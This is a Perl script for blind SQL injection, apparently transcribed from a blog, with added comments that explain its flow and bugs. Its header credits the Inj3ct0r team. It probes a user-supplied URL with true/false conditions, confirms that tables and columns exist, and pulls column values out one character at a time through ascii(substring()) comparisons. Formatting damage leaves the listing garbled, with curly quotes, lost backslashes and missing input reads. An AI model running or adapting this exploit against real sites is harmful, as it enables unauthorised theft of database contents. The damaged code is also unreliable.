#!/usr/bin/perl
use LWP::Simple;
use Time::HiRes qw(gettimeofday);
###############################################################
$string=”;
$limit=0;
#string variable###############################################
# if the string that you want to use cannot be typed #
# on the shell, you can put it in this variable and, #
# when the script asks you for the string, just #
# press enter. #
###############################################################
#limit variable##############################################
# if you want a particular column just change this #
# variable. #
#############################################################
# Transcription note: this listing went through a blog formatter and is not
# runnable as shown -- straight quotes became curly quotes, the backslashes in
# "\n" and "\d" were dropped, the "-" of some subtractions became an en dash,
# and the "<STDIN>" that should follow each bare "my $x =" is missing. The
# comments below describe the flow the code was evidently written for.
#
# Printable non-alphanumeric ASCII codes. opt_sym()/brute_sym() address this
# table by *index* (not by value) once a character is known to be neither a
# digit nor a letter.
@ascii_sym = (32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,58,59,60,61,62,63,64,91,92,93,94,95,96,123,124,125,126);
# Set by strc(): 1 when the marker $string occurs only in the "1=1" response,
# 0 when only in the "1=0" response. chvar() reads it to turn a response into
# a true/false answer. As a bare statement this line is a no-op.
$glob_stat;
print “nt===============================================*n”;
print “t* Blind Sql Injection Tool *n”;
print “t* Coded By Angel Injection *n”;
print “t* Member From Inj3ct0r Team *n”;
print “t* Thanks To:r0073r,Sid3^effects,r4dc0re,CrosS, *n”;
print “t===============================================*nn”;
print “Stage 1:Checking if the target is vulnerablenn”;
print “You should now enter the infected urln”;
print “Example :http://www.localhost/index.php?id=1nn”;
# Stage 1: the URL typed by the user is used verbatim (no parsing, encoding or
# validation) and two requests are sent with "+and+1=1" / "+and+1=0" appended.
# The round-trip time of the first one is kept in $exect and later used as the
# per-request cost for the time estimates. LWP::Simple::get() returns undef on
# any HTTP failure, which the regexes further down treat like an empty page.
print “URL: “;
my $url =
chomp($url);
$now = time_mili();
my $yes = get(“$url+and+1=1”);
$later = time_mili();
$exect = $later – $now;
$exect = sprintf(“%.2f”, $exect);
my $no = get(“$url+and+1=0”);
# def() diffs the two bodies, exits unless they differ by a heuristic amount,
# and writes the differing characters to ./string.txt in the current directory.
def($yes,$no);
print “Stage 2 :[*] Checking For A String That Can lead To exploit The Target[*]nn”;
print ” You should now enter a string(from shell or source code)n”;
print ” and wait to see if is a good one. Your string must be n”;
print ” related to the targetnn”;
print ” The string must exist on the true page or the false page n”;
print ” but not on both of them.n”;
print ” A file has been created under the name string.txt it may helpn”;
print ” you to choose your stringnn”;
# Stage 2: a marker string that must occur in exactly one of the two responses.
# strc() re-prompts until that holds; when $string was preset at the top of the
# file, a failing marker ends the run instead. $string is later interpolated
# unescaped into a regex (strc(), chvar()), so regex metacharacters in it
# change what is matched.
if($string eq ”){
print “String: “;
$string =
chomp($string);
while(strc($yes,$no)!=1){
print “String: “;
$string =
chomp($string);
}
}
else{
if(strc($yes,$no)!=1){
print “Please Choose another onen: “;
exit;
}
}
chomp($string);
print “n => Nice choicenn”;
# Stage 3 inputs: table name, column count, column names and an optional WHERE
# clause. All of them are interpolated verbatim into the SQL fragments that
# chvar() sends below; nothing is validated beyond the digit check on $num.
print “Stage 3 :[*] Extracting Information From Database[*]nn”;
print ” You should now enter The Table namen”;
print ” and number of Columns to be extractedn”;
print ” and their names and condition on this columnsn”;
print ” if you want itnn”;
print “Table Name : “;
my $tbname =
chomp($tbname);
print “Columns Number : “;
my $num =
chomp($num);
# Meant to accept an optionally signed integer; with the backslash lost in
# transcription the pattern reads "d+", so as shown it only accepts runs of
# the letter d. The same pattern is repeated in the retry loop below.
if($num =~ /^[+-]?d+$/){
chomp($num);
}
else{
while($num !~ /^[+-]?d+$/){
print “Columns Number : “;
$num =
chomp($num);
}
}
chomp($num);
# "my" binds to @column only; the other three are package globals. @trcolmun
# is a misspelling of the @trcolumn used below -- harmless without "use strict"
# because both are globals, but the declaration does nothing.
my @column,@trcolmun,@numtr,@result;
for(my $q=0;$q<$num;$q++){
print "Columns Name : ";
$column[$q] =
chomp($column[$q]);
}
print “n Do You have any condition on your informationn”;
print ” Exemple: where id=1nn”;
print “(yes/no): “;
my $condt =
chomp($condt);
# $condition stays undefined when the answer is not exactly "yes" and then
# interpolates as an empty string in the queries below.
if($condt eq ‘yes’){
print “nEnter Condition: “;
$condition=
chomp($condition);
}
print “nStage 3-1 :[*] Checking table and columns[*]nn”;
print ” Nothing That You Can do it nown”;
print ” just let the script do his jobnn”;
# Stage 3-1: existence checks. chvar() answers 1/0, or undef when the request
# failed (undef does not satisfy "==1", so a network error reads as "absent").
# The closing quote of this literal is a double-prime in the transcription.
my $pr=chvar(“$url+and+(SELECT 1 from $tbname limit 0,1)=1″);
if($pr==1){
print ” => Table Existen”;
}
else{
print ” => Table Dosn’t Existe”;
exit;
}
# $j counts the confirmed columns; @trcolumn keeps their names in order, and
# both drive the length and extraction loops that follow.
my $j=0;
for(my $q=0;$q<$num;$q++){
$pr = chvar("$url+and+(SELECT substring(concat(1,$column[$q]),1,1) from $tbname limit 0,1)=1");
if($pr==1){
$trcolumn[$j] = $column[$q];
print " => Column $column[$q] Existen”;
$j++;
}
else{
print ” => Column $column[$q] Dosn’t Existen”;
}
}
$trco = @trcolumn;
if($trco==0){
print “n => No Columns Foundn”;
exit;
}
# Stage 3-2: length of each confirmed column value. The query appends "::"
# (0x3a,0x3a) to the value and the loop walks position $ii until it finds two
# consecutive ':' (ASCII 58): one request per position, plus one extra request
# each time a lone ':' inside the value is hit. When the loop ends $ii is three
# past the value, hence "-= 3". The missing ";" after "$ii--" is tolerated
# only because it is the last statement of its block.
print “nStage 3-2 :[*] Extracting Columns length[*]nn”;
print ” The Script is going now to get eachn”;
print ” columns lengthn”;
print “nCounting length of Columns…nn”;
for(my $q=0;$q<$j;$q++){
my $qj=0;
my $ii=1;
while($qj==0){
$pr = chvar("$url+and+ascii(substring((select concat($trcolumn[$q],0x3a,0x3a)+from+$tbname $condition limit+$limit,1),$ii,1))=58");
if($pr==1){
$ii++;
$pr = chvar("$url+and+ascii(substring((select concat($trcolumn[$q],0x3a,0x3a)+from+$tbname $condition limit+$limit,1),$ii,1))=58");
if($pr==1){
$qj=1;
}
else{
$ii--
}
}
$ii++;
}
$ii -=3;
$numtr[$q]=$ii;
print " => $trcolumn[$q] : $iin”;
}
# Start every result string empty so ".=" below does not warn.
for(my $rul=0;$rul<$trco;$rul++){
$result[$rul]='';
}
$gtf=0;
($second, $minute, $hour) = localtime();
print "nExtracting information ...nn";
print "Guessing time for each column(in seconds)nn";
# Estimate: length times the Stage-1 round-trip time times 8, i.e. the
# authors budget about eight requests per character for opt()'s range
# narrowing; $gtf is the sum over all columns.
for(my $idn=0;$idn<$trco;$idn++){
$max = $numtr[$idn] * $exect * 8;
$max=sprintf("%.2f", $max);
$gtf+=$max;
print " #=> $trcolumn[$idn] max time of extraction = $maxn”;
}
print “nStart at $hour:$minute:$second (expected time to finish (in seconds) : $gtf)nn”;
# Stage 3-3: character-by-character extraction. For each position opt()
# issues a handful of comparison requests and returns the ASCII code, which
# pack("c") turns into the character appended to $result[$bn]. Every probe
# reaches the server as a distinct request, so the whole run is visible in
# its access log as a burst of "ascii(substring(" queries.
$now1 = time_mili();
for(my $bn=0;$bn<$trco;$bn++){
$nowt = time_mili();
for(my $bnum=1;$bnum<=$numtr[$bn];$bnum++){
my $ascii=opt("$url+and+ascii(substring((select concat($trcolumn[$bn],0x3a)+from+$tbname $condition limit+$limit,1),$bnum,1))");
$result[$bn].=pack("c",$ascii);
}
$latert = time_mili();
$realt = $latert - $nowt;
$realt=sprintf("%.2f", $realt);
print " => $trcolumn[$bn] = [$result[$bn]] (real time = $realt)n”;
}
$later1 = time_mili();
$exect1 = $later1 – $now1;
$exect1 = sprintf(“%.2f”, $exect1);
($second, $minute, $hour) = localtime() ;
print “nFinish at $hour:$minute:$second (elapsed time (in seconds) : $exect1) nn”;
# Resolves one character. $_[0] is a query prefix ending in an
# "ascii(substring(...))" expression; comparison predicates (">57", ">96") are
# appended and put to chvar() to decide between digits, upper case and lower
# case before brute_num()/brute_alpha() scan the chosen range. $isAlpha (">65")
# is built but never used. $sym_st records the range class (1 = not above '9',
# 2 = above '9' but not above '`', 3 = above '`') for the symbol fallback.
# Returns the ASCII code; when the range search comes back empty (ord() of ''
# or undef is 0) it retries through opt_sym().
sub opt{
my $url=$_[0];
my $isnum = $url;
my $sym_st;
$isnum .= “>57”;
my $isalpha = $url;
$isalpha .= “>96”;
my $isAlpha = $url;
$isAlpha .= “>65″;
my $rt=”;
my $brp = chvar($isnum);
if($brp==1){
my $brp1 = chvar($isalpha);
if($brp1==1){
$rt = brute_alpha($url,97,103,110,115,122);
$sym_st=3;
}
else{
$rt = brute_alpha($url,65,71,78,83,90);
$sym_st=2;
}
}
else{
$rt = brute_num($url);
$sym_st=1;
}
# A failed chvar() (undef) also lands here, so a network error during the
# letter/digit search is silently retried as a symbol.
if(ord($rt) == 0){
$rt = opt_sym($url,$sym_st);
}
return $rt;
}
# Symbol fallback for opt(). $_[1] is the range class from opt(); each branch
# hands brute_sym() a slice of @ascii_sym *indices*: class 1 -> codes 32-39 or
# 40-47 (split by a ">40" probe), class 2 -> codes 58-64, anything else ->
# codes 91-96 and 123-126. Code 40 itself satisfies neither side of the ">40"
# split and so comes back as @ascii_sym[0] (32). The "()" prototype would
# reject the two arguments if this sub were compiled before its caller; it is
# harmless only because the call in opt() precedes this definition.
sub opt_sym(){
my $url = $_[0];
my $rt=”;
if($_[1]==1){
my $ft = $url;
$ft .= “>40”;
my $rft = chvar($ft);
if($rft==1){
$rt = brute_sym($url,8,15);
}
else{
$rt = brute_sym($url,0,7);
}
}
else{
if($_[1]==2){
$rt=brute_sym($url,16,22);
}
else{
$rt=brute_sym($url,23,32);
}
}
return $rt;
}
# Linear scan of the closed range [$lo, $hi]: appends "=$code" to the query
# prefix and returns the first code that chvar() confirms. Yields nothing when
# no code is confirmed, so a scalar caller sees undef; a failed chvar() (undef)
# counts as "not confirmed" just like 0.
sub reduse{
    my ($lo, $hi, $prefix) = @_;
    for my $code ($lo .. $hi) {
        return $code if chvar("$prefix=$code") == 1;
    }
    return;
}
# Scans @ascii_sym between indices $from and $to (inclusive), asking chvar()
# whether the character equals each listed code, and returns the first code
# confirmed. When none is confirmed $hit stays undef, and indexing @ascii_sym
# with undef yields element 0 (code 32, the space) -- the caller cannot tell
# that case from a genuine space.
sub brute_sym(){
    my ($prefix, $from, $to) = @_;
    my $hit;
    for my $idx ($from .. $to) {
        next unless chvar($prefix . "=$ascii_sym[$idx]") == 1;
        $hit = $idx;
        last;
    }
    return $ascii_sym[$hit];
}
# Digit search: one ">52" probe splits '0'-'9' in two, then reduse() scans the
# remaining five codes. Returns the confirmed code, or undef when none is.
# The closing quote of ">52" is a double-prime in this transcription; the "()"
# prototype is not enforced because opt() calls this before it is compiled.
sub brute_num(){
my $url = $_[0];
my $ft = $url;
my $rt='';
$ft .= ">52″;
my $mrp = chvar($ft);
if($mrp==1){
$rt = reduse(53,57,$url);
}
else{
$rt = reduse(48,52,$url);
}
return $rt;
}
# Letter search over the range $_[1]..$_[5]. Up to three ">" probes against
# the split points $_[2], $_[3], $_[4] select one of four sub-ranges, which
# reduse() then scans linearly. opt() calls this with (97,103,110,115,122)
# for lower case and (65,71,78,83,90) for upper case. Returns the confirmed
# code or undef; a failed chvar() (undef) is taken as "not greater" and sends
# the search down the lowest branch.
sub brute_alpha(){
my $url = $_[0];
my $ft = $url;
my $sd = $url;
my $td = $url;
my $rt =”;
$ft .= “>$_[2]”;
$sd .= “>$_[3]”;
$td .= “>$_[4]”;
my $mrp = chvar($ft);
if($mrp==1){
my $mrp1 = chvar($sd);
if($mrp1==1){
my $mrp2=chvar($td);
if($mrp2==1){
$rt = reduse(($_[4]+1),$_[5],$url);
}
else{
$rt = reduse(($_[3]+1),$_[4],$url);
}
}
else{
$rt = reduse(($_[2]+1),$_[3],$url);
}
}
else{
$rt = reduse($_[1],$_[2],$url);
}
return $rt;
}
# Decides whether the marker in $string can serve as a true/false oracle.
# $_[0] is the "1=1" response body, $_[1] the "1=0" body. Returns 1 when the
# marker occurs in exactly one of them and records which in $glob_stat
# (1 = true page, 0 = false page); returns 0 when it occurs in both; yields a
# false value when it occurs in neither. $string is interpolated unescaped,
# so it is matched as a regex rather than as literal text, and an undef body
# (failed get()) simply never matches.
sub strc{
    my ($true_page, $false_page) = @_;
    my $on_true  = $true_page  =~ /$string/;
    my $on_false = $false_page =~ /$string/;
    if ($on_true && !$on_false) {
        $glob_stat = 1;
        return 1;
    }
    if ($on_false && !$on_true) {
        $glob_stat = 0;
        return 1;
    }
    # Marker on both pages: unusable.
    return 0 if $on_true;
    # Marker on neither page: a false value, as the original fall-through gives.
    return $on_false;
}
# Stage-1 vulnerability heuristic. Compares the "1=1" and "1=0" response bodies
# character by character, collects the characters of the first body that differ
# into $rt, and exits the program unless the pages differ "enough".
# split(//, undef) -- a failed get() -- yields an empty list.
sub def{
my @fi = split(//,$_[0]);
my @sd = split(//,$_[1]);
my $rt=”;
my $cn = @fi;
my $cn1 = @sd;
my $k;
# Intended as "$k = max($cn, $cn1)", but "=" binds looser than "?:", so Perl
# parses this as "(($cn>$cn1) ? $k=$cn : $k) = $cn1" (the ternary is
# assignable, see perlop) and $k ends up as $cn1 in both cases. Any tail of
# the first page beyond the second page's length is therefore never compared.
($cn>$cn1) ? $k=$cn : $k=$cn1;
# "my" covers $i only; $j is not declared here and resolves to the
# script-level $j of Stage 3-1, which is reset to 0 by this statement.
my $i,$j=0;
for($i=0;$i<$k;$i++){
if($fi[$i] ne $sd[$i]){
$rt.=$fi[$i];
$j++;
}
}
# After the loop $i == $k, so this accepts 5 < differences < length-300.
# The differing characters (untrusted server output) are written to
# ./string.txt through a bareword, two-argument, unchecked open; a failed
# open or write is silent.
if(($j>5) && ($j<($i-300))){
print "n => Target Maybe Vulnerablenn”;
open(MYFILE,’>string.txt’);
print MYFILE $rt;
close(MYFILE);
}
else{
print “n => Target Not Vulnerablenn”;
exit;
}
}
# Boolean oracle behind every probe. Fetches $probe_url, tests the body for
# the marker regex in $string, and maps the outcome through $glob_stat (set by
# strc()): returns 1 when the page is the "true" kind and 0 when it is the
# "false" kind. get() yields undef on an HTTP failure, which matches like an
# empty body; a $glob_stat that is neither 0 nor 1 falls through to a false
# value, and an undefined $glob_stat compares equal to 0.
sub chvar{
    my ($probe_url) = @_;
    my $body = get($probe_url);
    my $marker_seen = ($body =~ /$string/) ? 1 : 0;
    if ($glob_stat == 1) {
        return $marker_seen;
    }
    if ($glob_stat == 0) {
        return 1 - $marker_seen;
    }
    return;
}
# Wall-clock time in seconds to three decimals, returned as a number.
# Time::HiRes::gettimeofday() returns (seconds, microseconds); joining them
# with "." does not zero-pad the microseconds to six digits, so e.g. 5000 us
# becomes ".5000" (half a second) instead of ".005000" -- every timing derived
# from this (Stage 1 $exect, the estimates, the elapsed times) is therefore
# unreliable. "my $s,$m,$r;" declares only $s; $m and $r are package globals.
# The "()" prototype is harmless here because every call passes no arguments.
sub time_mili(){
my $s,$m,$r;
($s,$m) = gettimeofday();
$r = “$s.$m”;
$r +=0;
my $rt = sprintf(“%.3f”, $r);
$rt +=0;
return $rt;
}